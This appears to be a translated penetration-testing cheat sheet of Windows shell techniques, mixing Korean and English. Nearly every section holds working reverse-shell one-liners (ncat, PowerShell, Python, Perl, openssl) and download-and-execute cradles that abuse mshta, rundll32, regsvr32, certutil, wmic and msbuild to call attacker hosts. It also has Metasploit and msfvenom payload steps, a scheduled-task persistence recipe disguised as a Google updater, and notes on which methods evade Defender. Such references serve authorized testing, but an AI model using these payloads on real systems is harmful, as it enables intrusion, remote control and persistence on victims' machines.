Shells - Windows

Reading time: 16 minutes

Lolbas

페이지 lolbas-project.github.io는 Windows용이며 https://gtfobins.github.io/는 linux용입니다.
물론 there aren't SUID files or sudo privileges in Windows, 하지만 일부 binaries가 어떻게 (ab)used 되어 **execute arbitrary code.**와 같은 의도치 않은 동작을 수행할 수 있는지 아는 것은 유용합니다.

NC

nc.exe -e cmd.exe <Attacker_IP> <PORT>

NCAT

피해자

ncat.exe <Attacker_IP> <PORT>  -e "cmd.exe /c (cmd.exe  2>&1)"
#Encryption to bypass firewall
ncat.exe <Attacker_IP> <PORT eg.443> --ssl -e "cmd.exe /c (cmd.exe  2>&1)"

attacker

ncat -l <PORT>
#Encryption to bypass firewall
ncat -l <PORT eg.443> --ssl

SBD

sbd 은 휴대 가능하고 안전한 Netcat 대안입니다. Unix-like 시스템과 Win32에서 작동합니다. 강력한 암호화, 프로그램 실행, 사용자 지정 가능한 소스 포트, 지속적인 재연결 같은 기능을 통해 sbd는 TCP/IP 통신을 위한 다용도 솔루션을 제공합니다. Windows 사용자는 Kali Linux 배포판의 sbd.exe 버전을 Netcat의 신뢰할 수 있는 대체제로 사용할 수 있습니다.

# Victims machine
sbd -l -p 4444 -e bash -v -n
listening on port 4444


# Atackers
sbd 10.10.10.10 4444
id
uid=0(root) gid=0(root) groups=0(root)

Python

#Windows
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

Perl

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

#Windows
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Lua

lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

OpenSSH

Attacker (Kali)

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response

피해자

#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

Powershell

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile

네트워크 호출을 수행하는 프로세스: powershell.exe
Payload가 디스크에 기록됨: 아니오 (적어도 procmon으로는 찾을 수 없었습니다!)

powershell -exec bypass -f \\webdavserver\folder\payload.ps1

네트워크 호출을 수행하는 프로세스: svchost.exe
디스크에 기록된 Payload: WebDAV 클라이언트 로컬 캐시

한 줄 명령:

$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

이 문서 끝에서 다양한 Powershell Shells에 대한 자세한 정보를 확인하세요

Mshta

• From here

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

mshta http://webserver/payload.hta

mshta \\webdavserver\folder\payload.hta

hta-psh reverse shell 예시 (hta를 사용하여 PS backdoor를 다운로드하고 실행)

<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>

stager hta를 사용해 Koadic zombie를 매우 쉽게 download & execute할 수 있습니다

hta 예제

From here

<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
var c = "cmd.exe /c calc.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>

mshta - sct

From here

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:C:\local\path\scriptlet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

Mshta - Metasploit

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit

Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit

Defender에 의해 탐지됨

Rundll32

Dll hello world example

• From here

rundll32 \\webdavserver\folder\payload.dll,entrypoint

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

defender에 의해 탐지됨

Rundll32 - sct

From here

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

Rundll32 - Metasploit

use windows/smb/smb_delivery
run
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0

Rundll32 - Koadic

use stager/js/rundll32_js
set SRVHOST 192.168.1.107
set ENDPOINT sales
run
#Koadic will tell you what you need to execute inside the victim, it will be something like:
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();

Regsvr32

• 원문

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

Defender에 의해 탐지됨

Regsvr32 – /i 인자를 사용한 임의 DLL export (게이트키핑 및 지속성)

원격 scriptlets (scrobj.dll) 로딩 외에도, regsvr32.exe는 로컬 DLL을 로드하고 그 DllRegisterServer/DllUnregisterServer exports를 호출합니다. 맞춤형 loaders는 종종 이 동작을 악용하여 서명된 LOLBin과 섞여 임의 코드를 실행합니다. 실전에서 관찰된 두 가지 트레이드크래프트 노트:

• Gatekeeping argument: DLL은 특정 스위치가 /i:<arg>로 전달되지 않으면 종료합니다. 예: Chromium renderer 자식 프로세스를 모방하기 위한 /i:--type=renderer. 이는 우발적 실행을 줄이고 샌드박스를 방해합니다.
• Persistence: 업데이터 작업으로 가장하여 silent + 높은 권한과 필요한 /i 인자를 사용해 DLL을 실행하도록 regsvr32를 스케줄링:

Register-ScheduledTask \
-Action (New-ScheduledTaskAction -Execute "regsvr32" -Argument "/s /i:--type=renderer \"%APPDATA%\Microsoft\SystemCertificates\<name>.dll\"") \
-Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) \
-TaskName 'GoogleUpdaterTaskSystem196.6.2928.90.{FD10B0DF-...}' \
-TaskPath '\\GoogleSystem\\GoogleUpdater' \
-Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -DontStopOnIdleEnd) \
-RunLevel Highest

참고: ClickFix의 clipboard‑to‑PowerShell 변형은 JS loader를 스테이지한 후 regsvr32로 지속성을 확보합니다. Clipboard Hijacking

출처

<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
<scriptlet>
<registration
progid="PoC"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>

Regsvr32 - Metasploit

use multi/script/web_delivery
set target 3
set payload windows/meterpreter/reverse/tcp
set lhost 10.2.0.5
run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll

stager regsvr를 사용하여 Koadic zombie를 매우 쉽게 download & execute할 수 있습니다

Certutil

• From here

B64dll을 download하여 decode한 후 execute합니다.

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

B64exe를 다운로드하여 디코드한 뒤 실행하세요.

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

defender에 의해 탐지됨

Cscript/Wscript

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""

Cscript - Metasploit

msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs

defender에 의해 탐지됨

PS-Bat

\\webdavserver\folder\batchfile.bat

네트워크 호출을 수행하는 프로세스: svchost.exe
Payload가 디스크에 기록됨: WebDAV client local cache

msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
impacket-smbserver -smb2support kali `pwd`

\\10.8.0.3\kali\shell.bat

defender에 의해 탐지됨

MSIExec

공격자

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
python -m SimpleHTTPServer 80

대상:

victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi

탐지됨

Wmic

• 여기에서

wmic os get /format:"https://webserver/payload.xsl"

예제 xsl 파일 from here:

<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
]]>
</ms:script>
</stylesheet>

탐지되지 않음

stager wmic를 사용하면 Koadic zombie를 아주 쉽게 다운로드하고 실행할 수 있습니다

Msbuild

• From here

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

이 기법은 Application Whitelisting 및 Powershell.exe 제한을 우회하는 데 사용할 수 있습니다. PS shell이 표시됩니다.\ 다운로드하여 실행하세요: https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj

탐지되지 않음

CSC

피해자 머신에서 C# 코드를 컴파일합니다.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs

여기에서 기본 C# reverse shell을 다운로드할 수 있습니다: https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc

탐지되지 않음

Regasm/Regsvc

• 여기에서

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

시도해보지 않았습니다

https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182

Odbcconf

• 여기에서

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

시도해보지 않았습니다

https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2

Powershell Shells

PS-Nishang

https://github.com/samratashok/nishang

Shells 폴더에는 다양한 shells가 있습니다. Invoke-_PowerShellTcp.ps1_를 다운로드하고 실행하려면 스크립트를 복사한 뒤 파일 끝에 추가하세요:

Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444

web server에서 script를 제공하고 피해자 측에서 실행하세요:

powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"

Defender는 아직 이를 악성 코드로 탐지하지 않습니다 (3/04/2019).

TODO: 다른 nishang shells 확인하기

PS-Powercat

https://github.com/besimorhino/powercat

다운로드하고, 웹 서버를 시작한 뒤, listener를 시작하고 피해자 측에서 실행합니다:

powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"

Defender는 아직 이를 malicious code로 탐지하지 않습니다 (3/04/2019).

powercat에서 제공하는 다른 옵션:

Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files...

Serve a cmd Shell:
powercat -l -p 443 -e cmd
Send a cmd Shell:
powercat -c 10.1.1.1 -p 443 -e cmd
Send a powershell:
powercat -c 10.1.1.1 -p 443 -ep
Send a powershell UDP:
powercat -c 10.1.1.1 -p 443 -ep -u
TCP Listener to TCP Client Relay:
powercat -l -p 8000 -r tcp:10.1.1.16:443
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
powercat -c 10.1.1.15 -p 443 -e cmd -g
Start A Persistent Server That Serves a File:
powercat -l -p 443 -i C:\inputfile -rep

Empire

https://github.com/EmpireProject/Empire

powershell 런처를 생성하고 파일로 저장한 다음 다운로드하여 실행합니다.

powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"

악성 코드로 탐지됨

MSF-Unicorn

https://github.com/trustedsec/unicorn

unicorn을 사용하여 powershell 버전의 metasploit backdoor를 생성합니다.

python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443

생성한 resource로 msfconsole을 시작하세요:

msfconsole -r unicorn.rc

피해자에서 실행하도록 powershell_attack.txt 파일을 제공하는 웹 서버를 시작하세요:

powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"

악성 코드로 탐지됨

추가

PS>Attack PS 콘솔로 일부 offensive PS modules가 사전 로드되어 있음 (암호화됨)
https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9
WinPWN PS 콘솔로 일부 offensive PS modules 및 프록시 감지 포함 (IEX)

References

• https://highon.coffee/blog/reverse-shell-cheat-sheet/
• https://gist.github.com/Arno0x
• https://github.com/GreatSCT/GreatSCT
• https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/
• https://www.hackingarticles.in/koadic-com-command-control-framework/
• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
• https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/
• Check Point Research – Under the Pure Curtain: From RAT to Builder to Coder